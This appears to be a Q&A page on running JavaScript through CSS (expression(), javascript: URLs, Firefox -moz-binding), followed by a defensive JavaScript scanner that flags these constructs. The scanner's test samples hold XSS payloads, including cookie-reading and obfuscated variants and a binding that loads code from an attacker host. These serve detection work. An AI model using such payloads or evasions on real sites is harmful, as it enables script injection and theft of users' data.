Cross Site Scripting in CSS Stylesheets

Question
Is it possible to use cross site scripting in a CSS stylesheet? For example a reference stylesheet contains malicious code, how would you do this? I know you can use style tags but what about stylesheets?

Solution

From the browser security handbook (http://code.google.com/p/browsersec/wiki/Part1#Cascading_stylesheets):

The risk of JavaScript execution. As a little-known feature, some CSS implementations permit JavaScript code to be embedded in stylesheets. There are at least three ways to achieve this goal: by using the expression(...) directive, which gives the ability to evaluate arbitrary JavaScript statements and use their value as a CSS parameter; by using the url('javascript:...') directive on properties that support it; or by invoking browser-specific features such as the -moz-binding mechanism of Firefox.

... and after reading that, I find this on StackOverflow. See Using Javascript in CSS:

In Firefox, you can use XBL (http://www.mozilla.org/projects/xbl/) to inject JavaScript in a page via CSS. However, the XBL file must reside in the same domain, now that bug 324253 is fixed.

There is another interesting (though different from your question) way to abuse CSS. See http://scarybeastsecurity.blogspot.com/2009/12/generic-cross-browser-cross-domain.html. Essentially, you misuse the CSS parser to steal content from a different domain.
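The three script-bearing constructs the answer lists (expression(...), url('javascript:...') and -moz-binding) are easy to spell in ways a naive substring check misses: CSS escapes ("e\78 pression"), a comment inside the keyword ("expr/**/ession"), or whitespace inside the URL scheme. The scanner below is added here as an example and is not part of the original post or of the handbook; it normalises a stylesheet roughly the way a lenient parser would and reports those constructs. The function names and the sample stylesheets are constructed for this example.

```javascript
'use strict';

// Added example, not from the original post. Scans user-supplied CSS for the
// script-bearing constructs named in the answer and returns findings; the
// intended policy is to reject the stylesheet on any finding.

// CSS escapes: "\" + 1-6 hex digits + optional single whitespace, or "\" + any
// non-newline character. Decoding them is what defeats "e\78 pression".
function decodeCssEscapes(css) {
  return css.replace(
    /\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|([^\n\r\f]))/g,
    (_m, hex, ch) => {
      if (hex === undefined) return ch;
      const cp = parseInt(hex, 16);
      // NUL, surrogates and out-of-range values decode to U+FFFD per CSS Syntax.
      if (cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) return '\ufffd';
      return String.fromCodePoint(cp);
    }
  );
}

// Normalise a stylesheet the way a lenient parser would see it before matching.
function normalizeCss(css) {
  let s = css.replace(/\/\*[\s\S]*?\*\//g, '');      // drop comments (expr/**/ession)
  s = decodeCssEscapes(s);                             // fold escapes (e\78 pression)
  s = s.replace(/\/\*[\s\S]*?\*\//g, '');              // comments spelled via escapes
  s = s.replace(/[\x00-\x08\x0b\x0e-\x1f\x7f]/g, '');  // drop C0 controls except \t \n \f \r
  return s.toLowerCase();
}

// Each rule names a construct from the answer and a regex over the normalised text.
const RULES = [
  { kind: 'expression',  re: /expression\s*\(/g },   // IE dynamic properties
  { kind: 'moz-binding', re: /-moz-binding\s*:/g },  // Firefox XBL bindings via CSS
];

// url(...) needs its own handling: browsers ignore whitespace and control
// characters inside the scheme, so "jav<TAB>ascript:" must still be caught.
const URL_RE = /url\s*\(\s*(['"]?)\s*([^'")]*)/g;

function scanCss(css) {
  const text = normalizeCss(css);
  const findings = [];
  for (const { kind, re } of RULES) {
    for (const m of text.matchAll(re)) {
      findings.push({ kind, offset: m.index, snippet: text.slice(m.index, m.index + 40) });
    }
  }
  for (const m of text.matchAll(URL_RE)) {
    const target = m[2].replace(/[\x00-\x20]/g, '');
    if (target.startsWith('javascript:')) {
      findings.push({ kind: 'javascript-url', offset: m.index, snippet: text.slice(m.index, m.index + 40) });
    }
  }
  return findings;
}

// Policy helper: reject on any finding rather than trying to "clean" the sheet.
function isSafeCss(css) {
  return scanCss(css).length === 0;
}

// Constructed sample stylesheets for this example; not from the original page.
const SAMPLES = {
  clean: 'body { color: red; background: url("/img/bg.png"); }',
  expr: 'div { width: expression(alert(document.cookie)); }',
  exprEscaped: 'div { width: e\\78 pression(alert(1)); }',       // \78 is "x"
  exprComment: 'div { width: expr/**/ession(alert(1)); }',
  jsUrl: 'a { background: url("javascript:alert(1)"); }',
  jsUrlObfuscated: 'a { background: url(  jav\tascript:alert(1) ); }',
  mozBinding: 'body { -moz-binding: url("http://attacker.example/x.xml#b"); }',
};

// Returns { sampleName: [finding kinds] } so the result can be checked, not just printed.
function demo() {
  const report = {};
  for (const [name, css] of Object.entries(SAMPLES)) {
    report[name] = scanCss(css).map((f) => f.kind);
  }
  return report;
}

console.log(JSON.stringify(demo(), null, 2));
```

Only the "clean" sample comes back with no findings; each of the obfuscated variants is still reported as the construct it spells. The scanner is a deny filter, not a sanitiser: it does nothing about the cross-domain content theft the answer's last paragraph points to, which is a property of how the browser's CSS parser treats a non-CSS resource rather than of anything inside a genuine stylesheet.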
